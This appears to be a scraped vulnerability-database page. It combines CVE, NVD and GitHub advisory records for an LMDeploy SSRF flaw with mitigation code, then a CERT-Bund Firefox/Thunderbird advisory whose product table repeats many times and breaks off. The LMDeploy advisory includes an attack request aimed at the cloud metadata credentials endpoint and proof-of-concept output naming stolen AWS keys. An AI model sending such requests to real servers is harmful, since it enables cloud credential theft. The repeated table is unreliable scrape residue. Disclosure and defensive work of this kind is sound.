CVE-2026-33626 (GCVE-0-2026-33626)
Vulnerability from cvelistv5 – Published: 2026-04-20 20:29 – Updated: 2026-04-21 19:50
Title
LMDeploy Vulnerable to Server-Side Request Forgery (SSRF) via Vision-Language Image Loading
Summary
LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue.
Severity ?
7.5 (High)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://github.com/InternLM/lmdeploy/security/adv… | x_refsource_CONFIRM |
| https://github.com/InternLM/lmdeploy/pull/4447 | x_refsource_MISC |
| https://github.com/InternLM/lmdeploy/commit/71d64… | x_refsource_MISC |
| https://github.com/InternLM/lmdeploy/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-33626",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-21T17:52:10.383689Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-21T19:50:13.326Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "lmdeploy",
"vendor": "InternLM",
"versions": [
{
"status": "affected",
"version": "\u003c 0.12.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-20T20:29:19.558Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
},
{
"name": "https://github.com/InternLM/lmdeploy/pull/4447",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/InternLM/lmdeploy/pull/4447"
},
{
"name": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626"
},
{
"name": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"
}
],
"source": {
"advisory": "GHSA-6w67-hwm5-92mq",
"discovery": "UNKNOWN"
},
"title": "LMDeploy Vulnerable to Server-Side Request Forgery (SSRF) via Vision-Language Image Loading"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-33626",
"datePublished": "2026-04-20T20:29:19.558Z",
"dateReserved": "2026-03-23T14:24:11.617Z",
"dateUpdated": "2026-04-21T19:50:13.326Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-33626",
"date": "2026-05-22",
"epss": "0.08696",
"percentile": "0.92578"
}
}
}
FKIE_CVE-2026-33626
Vulnerability from fkie_nvd - Published: 2026-04-20 21:16 - Updated: 2026-04-23 13:39
Severity ?
Summary
LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:internlm:lmdeploy:*:*:*:*:*:*:*:*",
"matchCriteriaId": "208E5C1B-F678-46DA-8CF2-34C2525BF666",
"versionEndExcluding": "0.12.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "LMDeploy is a toolkit for compressing, deploying, and serving large language models. Versions prior to 0.12.3 have a Server-Side Request Forgery (SSRF) vulnerability in LMDeploy\u0027s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources. Version 0.12.3 patches the issue."
}
],
"id": "CVE-2026-33626",
"lastModified": "2026-04-23T13:39:54.420",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-04-20T21:16:35.097",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/InternLM/lmdeploy/pull/4447"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-6W67-HWM5-92MQ
Vulnerability from github – Published: 2026-04-21 15:04 – Updated: 2026-04-21 15:04
Summary
LMDeploy has Server-Side Request Forgery (SSRF) via Vision-Language Image Loading
Details
Summary
A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy's vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources.
Affected Versions
- Tested on: main branch (2026-02-04)
- Affected: All versions prior to 0.12.3
Vulnerable Code
File: `lmdeploy/vl/utils.py` (lines 64-67)

```python
def load_image(image_url: Union[str, Image.Image]) -> Image.Image:
    # ...
    if image_url.startswith('http'):
        response = requests.get(image_url, headers=headers, timeout=FETCH_TIMEOUT)
        # NO VALIDATION OF URL/IP BEFORE REQUEST
```

Also affected: `encode_image_base64()` function (lines 26-29)
Root Cause
1. No validation of URLs before fetching
2. No blocklist for internal IPs (127.0.0.1, 169.254.x.x, 10.x.x.x, 192.168.x.x)
3. Server binds to `0.0.0.0` by default (api_server.py line 1393)
4. API keys disabled by default
Attack Scenario
1. LMDeploy server deployed with vision-language model
2. Attacker sends request to `/v1/chat/completions` with malicious `image_url`:

```
POST /v1/chat/completions
{
  "model": "internlm-xcomposer2",
  "messages": [{
    "role": "user",
    "content": [
      {"type": "text", "text": "Describe this image"},
      {"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}}
    ]
  }]
}
```

3. Server fetches URL without validation
4. Attacker receives cloud credentials
Proof of Concept
Verified Exploitation Result

```
╔═══════════════════════════════════════════════════════════════════════╗
║ LMDeploy SSRF Vulnerability - Proof of Concept ║
╚═══════════════════════════════════════════════════════════════════════╝

[1] Starting callback server on port 8889...
[2] Attacker URL: http://127.0.0.1:8889/SSRF_PROOF?stolen_data=AWS_SECRET_KEY
[3] Calling vulnerable load_image() function...

======================================================================
[+] SSRF CALLBACK RECEIVED!
======================================================================
  Time: 2026-02-04 16:10:57
  Path: /SSRF_PROOF?stolen_data=AWS_SECRET_KEY
  Client: 127.0.0.1:51154
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
======================================================================

✅ SSRF VULNERABILITY CONFIRMED!
```
Impact
- Cloud Credential Theft: Access AWS/GCP/Azure metadata APIs
- Internal Service Access: Reach services not exposed to internet
- Information Disclosure: Port scan internal networks
- Lateral Movement: Pivot point for further attacks
Recommended Fix

```python
from urllib.parse import urlparse
import ipaddress
import socket

# Loopback, RFC 1918 private ranges and link-local (169.254.0.0/16)
BLOCKED_NETWORKS = [
    ipaddress.ip_network('127.0.0.0/8'),
    ipaddress.ip_network('10.0.0.0/8'),
    ipaddress.ip_network('172.16.0.0/12'),
    ipaddress.ip_network('192.168.0.0/16'),
    ipaddress.ip_network('169.254.0.0/16'),
]

def is_safe_url(url: str) -> bool:
    try:
        parsed = urlparse(url)
        if parsed.scheme not in ('http', 'https'):
            return False
        # Resolve the hostname and test the resulting address, not the URL text
        ip = socket.gethostbyname(parsed.hostname)
        ip_addr = ipaddress.ip_address(ip)
        return not any(ip_addr in network for network in BLOCKED_NETWORKS)
    except Exception:
        # Fail closed on any parse or resolution error
        return False
```
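The recommended fix above resolves a single IPv4 address with `socket.gethostbyname()` and compares it with five networks. The following is an added example of a stricter check, not LMDeploy's 0.12.3 patch and not code from the advisory: it vets every resolved address (IPv4 and IPv6, including IPv4-mapped IPv6) and returns the vetted addresses so the caller can connect to them directly. The names `check_image_url`, `is_public_ip`, `sample_resolver`, `SAMPLE_DNS` and the `*.example.test` hosts are assumptions made for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges blocked explicitly because the ipaddress flags below do not flag them
# as private on every Python version: carrier-grade NAT and the NAT64 prefix.
EXTRA_BLOCKED = [
    ipaddress.ip_network("100.64.0.0/10"),
    ipaddress.ip_network("64:ff9b::/96"),
]


def system_resolver(host, port):
    """Return every address (IPv4 and IPv6) the system resolver gives for host."""
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    return [info[4][0] for info in infos]


def is_public_ip(addr):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(addr.split("%", 1)[0])  # drop any IPv6 zone id
    # ::ffff:127.0.0.1 must be judged as 127.0.0.1, not as an IPv6 address.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    if (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified):
        return False
    return not any(ip in net for net in EXTRA_BLOCKED if net.version == ip.version)


def check_image_url(url, resolver=system_resolver):
    """Return (host, port, vetted_ips) or raise ValueError (fail closed)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    try:
        addrs = resolver(host, port)
    except OSError as exc:
        raise ValueError("cannot resolve host") from exc
    if not addrs:
        raise ValueError("host has no addresses")
    # One internal record among several public ones is enough to reject:
    # the HTTP client may pick any of them when it connects.
    blocked = [a for a in addrs if not is_public_ip(a)]
    if blocked:
        raise ValueError("resolves to non-public address " + blocked[0])
    return host, port, addrs


# Constructed DNS answers so the example runs offline (not real records).
SAMPLE_DNS = {
    "images.example.test": ["93.184.216.34"],
    "metadata.example.test": ["169.254.169.254"],
    "mixed.example.test": ["93.184.216.34", "10.0.0.5"],
    "v6map.example.test": ["::ffff:127.0.0.1"],
}


def sample_resolver(host, port):
    """Stand-in resolver backed by SAMPLE_DNS; IP literals resolve to themselves."""
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        pass
    if host not in SAMPLE_DNS:
        raise OSError("no such host")
    return SAMPLE_DNS[host]


def verdict(url, resolver=sample_resolver):
    """Human-readable decision for one URL."""
    try:
        check_image_url(url, resolver)
        return "allow"
    except ValueError as exc:
        return "deny: " + str(exc)


if __name__ == "__main__":
    for sample in (
        "http://images.example.test/cat.png",
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://127.0.0.1:8889/SSRF_PROOF",
        "http://mixed.example.test/a.png",
        "http://v6map.example.test/a.png",
    ):
        print(sample, "->", verdict(sample))
```

The caller should connect to one of the returned addresses rather than resolving the name a second time, and should run the same check on every redirect target instead of following redirects automatically.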
Credit
This vulnerability was discovered as part of Orca Security's research.
Researcher: Igor Stepansky
Organization: Orca Security
Emails:
igor.stepansky@orca.security
iggy.p0pi@orca.security
Severity ?
7.5 (High)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "lmdeploy"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.12.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33626"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-21T15:04:13Z",
"nvd_published_at": "2026-04-20T21:16:35Z",
"severity": "HIGH"
},
"id": "GHSA-6w67-hwm5-92mq",
"modified": "2026-04-21T15:04:13Z",
"published": "2026-04-21T15:04:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33626"
},
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/pull/4447"
},
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626"
},
{
"type": "PACKAGE",
"url": "https://github.com/InternLM/lmdeploy"
},
{
"type": "WEB",
"url": "https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "LMDeploy has Server-Side Request Forgery (SSRF) via Vision-Language Image Loading"
}
WID-SEC-W-2026-1228
Vulnerability from csaf_certbund - Published: 2026-04-21 22:00 - Updated: 2026-05-20 22:00
Summary
Mozilla Thunderbird, Firefox ESR and Firefox: Multiple Vulnerabilities
Severity
High
Notes
As a provider, the BSI is responsible under general law for its own content that it makes available for use. Users are, however, responsible for carefully checking, case by case, the use and/or implementation of the information provided with that content.
Product description: Thunderbird is an open source e-mail client.
Firefox is an open source web browser.
Attack: An attacker can exploit multiple vulnerabilities in Mozilla Thunderbird, Mozilla Firefox ESR and Mozilla Firefox to escalate privileges, carry out a denial-of-service attack, disclose information, display false information, and bypass security measures.
Affected operating systems:
- Linux
- Other
- UNIX
- Windows
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Mozilla Firefox <150 (Mozilla / Firefox) | | <150 | |
| Red Hat Enterprise Linux 8.8 (Red Hat / Enterprise Linux) | cpe:/o:redhat:enterprise_linux:8.8 | 8.8 | |
| Mozilla Firefox ESR <140.10 (Mozilla / Firefox ESR) | | <140.10 | |
| Mozilla Firefox ESR <115.35 (Mozilla / Firefox ESR) | | <115.35 | |
| Mozilla Thunderbird <140.10 (Mozilla / Thunderbird) | | <140.10 | |
| Red Hat Enterprise Linux (Red Hat / Enterprise Linux) | cpe:/o:redhat:enterprise_linux:- | — | |
| Mozilla Thunderbird <150 (Mozilla / Thunderbird) | | <150 | |
| Oracle Linux (Oracle) | cpe:/o:oracle:linux:- | — | |
| RESF Rocky Linux (RESF / Rocky Linux) | cpe:/o:resf:rocky_linux:- | — | |
| RESF Rocky Linux 9 (RESF / Rocky Linux) | cpe:/o:resf:rocky_linux:9 | 9 | |
| Debian Linux (Debian) | cpe:/o:debian:debian_linux:- | — | |
| SUSE Linux (SUSE) | cpe:/o:suse:suse_linux:- | — | |
| SUSE openSUSE (SUSE) | cpe:/o:suse:opensuse:- | — | |
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
Mozilla Firefox ESR <115.35
Mozilla / Firefox ESR
|
<115.35 | ||
|
Mozilla Thunderbird <140.10
Mozilla / Thunderbird
|
<140.10 | ||
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Mozilla Thunderbird <150
Mozilla / Thunderbird
|
<150 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
RESF Rocky Linux
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
RESF Rocky Linux 9
RESF / Rocky Linux
|
cpe:/o:resf:rocky_linux:9
|
9 | |
|
Debian Linux
Debian
|
cpe:/o:debian:debian_linux:-
|
— | |
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
SUSE openSUSE
SUSE
|
cpe:/o:suse:opensuse:-
|
— |
Affected products
Known affected
13 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Mozilla Firefox <150
Mozilla / Firefox
|
<150 | ||
|
Red Hat Enterprise Linux 8.8
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:8.8
|
8.8 | |
|
Mozilla Firefox ESR <140.10
Mozilla / Firefox ESR
|
<140.10 | ||
|
